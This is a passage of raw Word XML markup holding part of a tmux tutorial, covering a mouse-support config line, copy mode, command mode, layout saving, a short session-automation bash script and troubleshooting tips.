    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BEF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B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F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Customizing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BF3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pP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can be customized via the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~/.tmux.conf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BF4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BF5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example Config:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BF6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Enable mouse support</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BF7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set -g mouse on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BF8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BF9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply the configuration with:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BFA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux source-file ~/.tmux.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BFB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B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FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BFE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Advanced Features</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BFF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1060"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scrollback History</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C00">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1060"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter copy mode: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C01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1060"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scroll: Use arrow keys or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PgUp</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PgDn</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1060"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exit: Press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">q</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1060"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy and Paste</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C04">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1060"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter copy mode: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C05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1060"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start selection: Press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Space</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C06">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1060"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">End selection: Press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1060"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Paste: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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1060"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Mode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C09">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1060"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Access: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C0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1060"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example: Rename a window with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rename-window new_name</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1060"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Save Session Layout</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C0C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1060"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Save layout: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux list-windows -t session_name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1060"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Restore layout: Use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">select-layout</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C0E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scriptable Automation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Automate </w:t>
      </w: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sessions in scripts for project-specific workflows.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> Example:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> #!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C0F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux new-session -d -s my_project</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C10">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux send-keys -t my_project "cd ~/project &amp;&amp; vim" C-m</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C11">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux split-window -h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C12">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux send-keys "htop" C-m</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C13">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux attach-session -t my_project</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C14">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C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16">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C17">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C18">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="182"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lost session</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tmux ls</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to check if the session exists.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="182"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pane resizing issues</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Ensure the terminal window is large enough to accommodate your layout.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C1A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
